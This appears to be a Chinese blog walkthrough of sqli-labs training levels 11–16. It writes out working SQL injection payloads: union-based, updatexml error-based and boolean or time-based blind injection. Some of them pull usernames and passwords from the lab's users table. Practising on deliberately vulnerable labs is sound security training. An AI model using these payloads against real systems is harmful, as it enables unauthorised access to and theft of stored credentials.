sqli-labs-php7-master第11-16关

猜注入点

先来猜数字型

单引号字符型:

发现注入点找到了

猜测数据库有多少个字段:

1' order by 4 #

密码随便输的。

这里没有使用--+注释,因为没作用,可能是过滤掉了

继续猜。刚才没猜对

1' order by 2 #

没报错,猜对了。列数有两栏

查询数据库名称:

1' union select 1,databse() #

查询表名:

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'security' #

列名:

1' union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security' #

字段名:

1'union select 1,group_concat(id,0x3a,username,0x3a,password) from users #

12关:

测试得出注入点为")

操作和之前一样

13关:

猜测得出注入点为')

这关有点不太一样

1') union select 1,2 #

发现没结果

再来看看有没有报错信息

看来还是有错误信息的,如果没有错误信息在考虑时间盲注

数据库名:

1') and updatexml(1,concat(0x7e,(select database())),3)#

爆破数据表名:

1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')),3)#

数据字段名:

1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),3)#

字段值:

1') and updatexml(1,concat(0x7e,(select group_concat(id,0x3a,username,0x3a,password) from users)),3)#

第14关:

猜测得出注入点 "

然后操作跟之前一样

第15关:

测试了半天页面都没反应,说明没结果返回,不能使用报错注入了

首先可以结合联合查询猜

1' union select 1#

1' union select 1,2#

在数据库后面执行的代码:

SELECT username, password FROM users WHERE username='a' union select 1,2 #

猜数据库长度(结合布尔盲注)

因为我们观察到页面是有变化的。所以可行

a' or length(database())=8#

这是猜测后的结果

如果猜错了:

a' or length(database())>8#

其他的也可以这样猜,比如第一个字符

猜第一个字符是什么(结合时间盲注):

a' union select 1,2 and if(length(database())=8,sleep(3),0)#

第16关

这一关和十五关用的方法一样,只不过注入点换成了 ") 。

1") union select 1,2#

相关推荐
Lu Yao_3 小时前
Redis 持久化
数据库·redis·缓存
June`3 小时前
Redis5安装与核心命令详解
数据库·redis·缓存
安当加密6 小时前
达梦数据库TDE透明加密解决方案:构建高安全数据存储体系
网络·数据库·安全
Jabes.yang9 小时前
Java求职面试实战:从Spring Boot到微服务架构的技术探讨
java·数据库·spring boot·微服务·面试·消息队列·互联网大厂
阿巴~阿巴~10 小时前
Redis 核心文件、命令与操作指南
数据库·redis·缓存·客户端·服务端
koping_wu10 小时前
【Redis】用Redis实现分布式锁、乐观锁
数据库·redis·分布式
abcefg_h10 小时前
关系型数据库与非关系型数据库
数据库·nosql
lubiii_11 小时前
SQLMap常用命令指南(参数及其用法)
sql·web安全·网络安全
海奥华211 小时前
SQLEXPLAIN 详解
数据库·mysql
00后程序员张11 小时前
【Python】基于 PyQt6 和 Conda 的 PyInstaller 打包工具
运维·服务器·数据库